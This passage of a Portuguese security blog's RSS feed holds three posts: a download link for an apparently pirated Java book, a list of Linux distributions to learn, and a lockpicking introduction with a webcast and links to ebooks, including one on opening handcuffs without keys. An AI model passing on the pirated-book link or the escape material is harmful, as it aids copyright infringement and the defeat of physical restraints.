white-space: normal; word-spacing: 0px;&quot;&gt;- Use a Cabeça! Java&lt;/span&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;b style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Onde Faço o Download do Torrent?&lt;/b&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;b&gt;&lt;a href=&quot;https://anonfiles.com/file/33c103bf077b34a49da6b1e9e6880874&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Aqui&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;&lt;/span&gt;&lt;br style=&quot;color: black; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot; /&gt;&lt;/span&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;Creditos: &lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white;&quot;&gt;&lt;span style=&quot;color: black; display: inline ! important; float: none; font-family: tahoma; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=&quot;color: black;&quot;&gt;whITe_D3m0N&lt;/span&gt;&lt;/b&gt;</description><link>http://max-sec.blogspot.com/2013/10/salve-salve-galera-estou-colocando-um.html</link><author>noreply@blogger.com (Anonymous)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieed-dyvXewsygWZfCerSPKnAYlvcTNhviB9rJj28J1vhymSIsL9liDRY97ChpGcBE56y2repTrgEruTk_L9p-pjI8k_sM-re9MV8mzii_WyPbpOfHp4Lhyphenhyphenxou28Xx6rYUKBT8leNFDQU/s72-c/697_tablet_01.jpg" height="72" width="72"/><thr:total>5</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-412091622473211158</guid><pubDate>Wed, 24 Jul 2013 15:10:00 +0000</pubDate><atom:updated>2013-07-24T08:10:31.468-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Artigos</category><title>6 distribuições Linux que você deve dominar bem.</title><description>&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/linux-penguin.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/linux-penguin.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;linux-penguin&quot; class=&quot;size-medium wp-image-99 aligncenter&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/linux-penguin.jpg?w=300&quot; height=&quot;178&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/linux-penguin.jpg?w=300&quot; style=&quot;border: 0px; clear: both; cursor: default; display: block; height: auto; margin: 0px auto 12px; max-width: 100%;&quot; width=&quot;300&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
A natureza aberta do Linux permitiu o desenvolvimento de sistemas de diferentes distribuições desse sistema operacional. Cada distribuição tem suas particularidades, algumas bastante distintas, outras nem tanto, mas qualquer um que queira se tornar um especialista Linux precisa estar preparado para a situação em que ele precisará instalar, configurar, operar ou reparar alguma distribuição com a qual ele nunca teve contato antes.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Considerando que é humanamente impossível alguém adquirir experiência em todas as distribuições Linux existentes, fiz uma lista das 6 distribuições que, se bem conhecidas pelo profissional Linux, garantirão que este consiga utilizar e administrar virtualmente qualquer distribuição que exista ou venha a existir. Vamos lá!&lt;br /&gt;
&lt;img alt=&quot;&quot; class=&quot;mce-wp-more mceItemNoResize&quot; data-mce-src=&quot;http://nerdaily.wordpress.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif&quot; src=&quot;http://nerdaily.wordpress.com/wp-includes/js/tinymce/plugins/wordpress/img/trans.gif&quot; style=&quot;background-image: url(http://nerdaily.wordpress.com/wp-includes/js/tinymce/themes/advanced/skins/wp_theme/img/more_bug.gif); background-position: 100% 0%; background-repeat: no-repeat no-repeat; border-top-color: rgb(204, 204, 204); border-top-style: dotted; border-width: 1px 0px 0px; cursor: default; display: block; height: 12px; margin: 15px auto 0px; width: 608px;&quot; title=&quot;More...&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;b style=&quot;color: black;&quot;&gt;1. Slackware&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/slack.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/slack.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;slack&quot; class=&quot;alignnone size-full wp-image-83&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/slack.jpg&quot; height=&quot;100&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/slack.jpg&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;100&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
O Slackware é a distribuição mais antiga ainda em atividade. Tem a fama de ser mais difícil de instalar, configurar e usar. Na verdade, o Slackware não é difícil, mas também não é intuitivo, o que significa que não adiantar tentar fazer as coisas nele por tentativa e erro, você tem que saber o que está fazendo, e isso faz com que você seja praticamente obrigado a estudar e conhecer os componentes do sistema para fazê-lo funcionar.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Site oficial:&amp;nbsp;&lt;a data-mce-href=&quot;http://slackware.com&quot; href=&quot;http://slackware.com/&quot; style=&quot;color: #743399;&quot;&gt;slackware.com&lt;/a&gt;&lt;br /&gt;
&lt;b style=&quot;color: black;&quot;&gt;2. Debian&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/debian.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/debian.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;debian&quot; class=&quot;alignnone size-full wp-image-84&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/debian.jpg&quot; height=&quot;100&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/debian.jpg&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;70&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
falar que foi a primeira distribuição a Linux a ter um sistema completo de gerenciamento de pacotes de software que pesquisa, faz download, instala, configura e resolve dependências de maneira rápida e eficiente. Trata-se do APT, ferramenta que ainda hoje é considerada por muitos (me incluo nesta lista) como a melhor e mais completa do gênero dentre todas as distribuições Linux.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Site oficial:&amp;nbsp;&lt;a data-mce-href=&quot;http://debian.org&quot; href=&quot;http://debian.org/&quot; style=&quot;color: #743399;&quot;&gt;debian.org&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;b style=&quot;color: black;&quot;&gt;3. Fedora&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;right&quot; data-mce-style=&quot;text-align: left;&quot; style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/fedora.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/fedora.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;fedora&quot; class=&quot;alignnone size-full wp-image-91&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/fedora.jpg&quot; height=&quot;100&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/fedora.jpg&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;100&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Distribuição mantida pela Red Hat, a líder mundial em venda, suporte, treinamento e certificação Linux, o Fedora é conhecido por manter uma disputa acirrada com o Ubuntu pelo título de distribuição mais inovadora, trazendo a cada lançamento recursos que são usados por poucas ou nenhuma outra distribuição. Utiliza um excelente gerenciador de pacotes de software, o Yum, adotado também por muitas outras distribuições.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Site oficial:&amp;nbsp;&lt;a data-mce-href=&quot;http://fedoraproject.org&quot; href=&quot;http://fedoraproject.org/&quot; style=&quot;color: #743399;&quot;&gt;fedoraproject.org&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;b style=&quot;color: black;&quot;&gt;4. Ubuntu&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;right&quot; data-mce-style=&quot;text-align: left;&quot; style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/ubuntu.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/ubuntu.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;ubuntu&quot; class=&quot;alignnone size-full wp-image-92&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/ubuntu.jpg&quot; height=&quot;100&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/ubuntu.jpg&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;97&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div align=&quot;right&quot; style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
O Ubuntu é simplesmente a distribuição Linux mais conhecida e utilizada da atualidade. Precisa de mais argumentos para justificar por que você deve dominá-la?&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Site oficial:&amp;nbsp;&lt;a data-mce-href=&quot;http://ubuntu.com&quot; href=&quot;http://ubuntu.com/&quot; style=&quot;color: #743399;&quot;&gt;ubuntu.com&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;b style=&quot;color: black;&quot;&gt;&lt;br /&gt;5. CentOS&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;right&quot; data-mce-style=&quot;text-align: left;&quot; style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 12px; line-height: 18px;&quot;&gt;
&amp;nbsp;&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/centos.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/centos.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;centOs&quot; class=&quot;alignnone size-medium wp-image-93&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/centos.jpg?w=100&quot; height=&quot;100&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/centos.jpg?w=100&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;100&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Criado a partir do código-fonte do Red Hat Enterprise Linux, o CentOS é a distribuição mais usada em servidores Web em toda a internet, conforme pesquisa publicada em Julho de 2010 pela Web Technology Surveys. Além disso, por ser derivada do Red Hat Enterprise Linux e totalmente compatível com este, o CentOS é a distribuição mais recomendada para aqueles que querem aprender a utilizar o RHEL e estudar para os exames da Red Hat tais como RHCT e RHCE.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Site oficial:&lt;a data-mce-href=&quot;http://centos.org&quot; href=&quot;http://centos.org/&quot; style=&quot;color: #743399;&quot;&gt;&amp;nbsp;centos.org&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;b style=&quot;color: black;&quot;&gt;6. OpenSUSE&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;right&quot; data-mce-style=&quot;text-align: left;&quot; style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/open.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/open.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;open&quot; class=&quot;alignnone size-full wp-image-95&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/open.jpg&quot; height=&quot;63&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/open.jpg&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;100&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div data-mce-style=&quot;text-align: left;&quot; style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
O OpenSUSE é uma excelente distribuição mantida pela Novell, umas das grande líderes do mercado de Linux corporativo que, assim como a Red Hat, também possui seu próprio programa de certificação profissional em Linux. Possui uma comunidade de usuários bem forte e é talvez a distribuição mais popular a adotar o KDE como ambiente gráfico padrão.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Site oficial:&amp;nbsp;&lt;a data-mce-href=&quot;http://opensuse.org&quot; href=&quot;http://opensuse.org/&quot; style=&quot;color: #743399;&quot;&gt;opensuse.org&lt;/a&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Menções honrosas&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
A galera do Doode avaliou essa postagem e apontaram algumas duas distribuições que deveriam constar nesta lista. Achei justo, portanto, citá-las aqui, agregando opiniões diferentes da minha.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;b style=&quot;color: black;&quot;&gt;Archlinux&lt;br /&gt;&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/arch.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/arch.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;arch&quot; class=&quot;alignnone size-full wp-image-96&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/arch.jpg&quot; height=&quot;75&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/arch.jpg&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;100&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;right&quot; data-mce-style=&quot;text-align: left;&quot; style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 12px; line-height: 18px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
O Archlinux é uma distribuição otimizada para processadores i686. Tem uma filosofia parecida com a do Slackware no que diz respeito a não incluir no sistema muitas ferramentas que façam o trabalho do administrador, que precisa entender o sistema para conseguir utilizá-lo. Possui um excelente gerenciador de pacotes chamado Pacman, utilizado para gerenciar pacotes binários, e o ABS (Archlinux Build System) para instalar softwares através da compilação automatizada do código-fonte.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
É uma distro bastante diferente de qualquer uma destas outras (apesar de insistirem em compará-lo ao Slack, estas semelhanças param no KISS [Keep It Simple, Stupid]), está numa crescente e ensina hábitos extremamente valiosos para qualquer usuário Linux. - Danilo Vilas Boas&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
&lt;b style=&quot;color: black;&quot;&gt;Gentoo&lt;br /&gt;&lt;a data-mce-href=&quot;http://nerdaily.files.wordpress.com/2013/03/gentoo.jpg&quot; href=&quot;http://nerdaily.files.wordpress.com/2013/03/gentoo.jpg&quot; style=&quot;color: #743399;&quot;&gt;&lt;img alt=&quot;gentoo&quot; class=&quot;alignnone size-full wp-image-97&quot; data-mce-src=&quot;http://nerdaily.files.wordpress.com/2013/03/gentoo.jpg&quot; height=&quot;100&quot; src=&quot;http://nerdaily.files.wordpress.com/2013/03/gentoo.jpg&quot; style=&quot;border: 0px; cursor: default; height: auto; margin: 0px; max-width: 100%;&quot; width=&quot;98&quot; /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
O Gentoo foi inicialmente criado para ser uma distribuição que fosse compilada a partir do código-fonte, otimizada para o Hardware, somente com os programas necessários e com scripts para diminuir o trabalho de manutenção. Utiliza o Portage para gerenciar pacotes de software, que são compilados na própria máquina para melhor aproveitamento de seus recursos de hardware.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
É uma distro que também vai ensinar coisas que só podem ser aprendidas com ela, especialmente no que tange a manter uma distro compilada e otimização de compilação.&lt;/div&gt;
&lt;div style=&quot;color: #444444; font-family: Georgia, &#39;Bitstream Charter&#39;, serif; font-size: 16px; margin-bottom: 24px;&quot;&gt;
Créditos: Davidson Paulo, especialista Linux.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
</description><link>http://max-sec.blogspot.com/2013/07/6-distribuicoes-linux-que-voce-deve.html</link><author>noreply@blogger.com (Unknown)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-2844162267975274904.post-1995052924906629194</guid><pubDate>Mon, 06 Aug 2012 06:27:00 +0000</pubDate><atom:updated>2012-08-05T23:27:58.372-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Diversos.</category><title>Segurança Física: Lockpicking</title><description>&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;O que é Lockpicking?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://upload.wikimedia.org/wikipedia/commons/thumb/8/88/Lockpicking_Tools.jpg/800px-Lockpicking_Tools.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;127&quot; src=&quot;http://upload.wikimedia.org/wikipedia/commons/thumb/8/88/Lockpicking_Tools.jpg/800px-Lockpicking_Tools.jpg&quot; width=&quot;320&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&amp;nbsp; &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Lock picking&lt;/b&gt;&lt;/i&gt; é a &lt;a href=&quot;http://pt.wikipedia.org/wiki/T%C3%A9cnica&quot; title=&quot;Técnica&quot;&gt;técnica&lt;/a&gt; de abrir &lt;a class=&quot;mw-redirect&quot; href=&quot;http://pt.wikipedia.org/wiki/Fechadura&quot; title=&quot;Fechadura&quot;&gt;fechaduras&lt;/a&gt;, &lt;a href=&quot;http://pt.wikipedia.org/wiki/Ma%C3%A7aneta&quot; title=&quot;Maçaneta&quot;&gt;maçanetas&lt;/a&gt; ou &lt;a href=&quot;http://pt.wikipedia.org/wiki/Cadeado&quot; title=&quot;Cadeado&quot;&gt;cadeados&lt;/a&gt; sem utilizar &lt;a href=&quot;http://pt.wikipedia.org/wiki/Chave&quot; title=&quot;Chave&quot;&gt;chaves&lt;/a&gt; através da manipulação do mecanismo de fechamento. Geralmente, os chaveiros possuem os equipamentos de &lt;i&gt;lock picking&lt;/i&gt; para utilizar no trabalho. O &lt;i&gt;lock picking&lt;/i&gt; é usado tanto em casos de emergência como para fins criminais. É permitido adquirir ferramentas para &lt;i&gt;lock picking&lt;/i&gt;, porém usá-las com fins criminais pode ser punível.&lt;br /&gt;
Foi criado em meados do século 15, usando ferramentas bastantes 
primitivas o equipamento evitava o arrobamentos de portas permitindo 
assim surgir um mercado próprio para a nova técnica que se aperfeiçoou 
com o tempo.&lt;br /&gt;
&lt;br /&gt;
Origem: Wikipédia, a enciclopédia livre.&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt; &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
  &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Webcast da &lt;a href=&quot;http://oys.com.br/&quot; target=&quot;_blank&quot;&gt;OYS&lt;/a&gt; sobre o assunto.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
  &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;
  &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;iframe allowfullscreen=&quot;allowfullscreen&quot; frameborder=&quot;0&quot; height=&quot;281&quot; mozallowfullscreen=&quot;mozallowfullscreen&quot; src=&quot;http://player.vimeo.com/video/46998089&quot; webkitallowfullscreen=&quot;webkitallowfullscreen&quot; width=&quot;500&quot;&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;a href=&quot;http://vimeo.com/46998089&quot;&gt;webcast20120319 video&lt;/a&gt; from &lt;a href=&quot;http://vimeo.com/user12830060&quot;&gt;Max Fonseca&lt;/a&gt; on &lt;a href=&quot;http://vimeo.com/&quot;&gt;Vimeo&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Os slides do webcast &lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;iframe allowfullscreen=&quot;allowfullscreen&quot; frameborder=&quot;0&quot; height=&quot;356&quot; marginheight=&quot;0&quot; marginwidth=&quot;0&quot; scrolling=&quot;no&quot; src=&quot;http://www.slideshare.net/slideshow/embed_code/13391141&quot; style=&quot;border-width: 1px 1px 0; border: 1px solid #CCC; margin-bottom: 5px;&quot; width=&quot;427&quot;&gt;&lt;/iframe&gt; &lt;br /&gt;
&lt;div style=&quot;margin-bottom: 5px;&quot;&gt;
&lt;b&gt; &lt;a href=&quot;http://www.slideshare.net/luizvieira/segurana-fsica-lockpicking&quot; target=&quot;_blank&quot; title=&quot;Segurança Física: Lockpicking&quot;&gt;Segurança Física: Lockpicking&lt;/a&gt; &lt;/b&gt; from &lt;b&gt;&lt;a href=&quot;http://www.slideshare.net/luizvieira&quot; target=&quot;_blank&quot;&gt;Luiz Vieira&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Mais material ainda:&lt;/b&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.wowebook.be/bbs//viewtopic.php?p=3334&amp;amp;sid=d1f229e5df313d26a23a6e54a3024dfd&quot;&gt;http://www.wowebook.be/bbs//viewtopic.php?p=3334&amp;amp;sid=d1f229e5df313d26a23a6e54a3024dfd&lt;/a&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;b&gt;Livros sobre o assunto:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white;&quot;&gt;&lt;/span&gt;&lt;br /&gt;
Practical Lock Picking: A Physical Penetration Tester&#39;s Training Guide:&lt;br /&gt;
&lt;a href=&quot;http://ebooklink.net/g/detail/1597496111/Practical%20Lock%20Picking:%20A%20Physical%20Penetration%20Tester%27s%20Training%20Guide/&quot;&gt;http://ebooklink.net/g/detail/1597496111/Practical%20Lock%20Picking:%20A%20Physical%20Penetration%20Tester&#39;s%20Training%20Guide/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
How to Open Handcuffs Without Keys - Ebook Detail:&lt;br /&gt;
&lt;a href=&quot;http://ebooklink.net/g/detail/0879471204/How%20to%20Open%20Handcuffs%20Without%20Keys&quot;&gt;http://ebooklink.net/g/detail/0879471204/How%20to%20Open%20Handcuffs%20Without%20Keys&lt;/a&gt;/&lt;br /&gt;
&lt;br /&gt;
Improvised Lock Picking: Secrets from the Master - Ebook Detail:&lt;br /&gt;
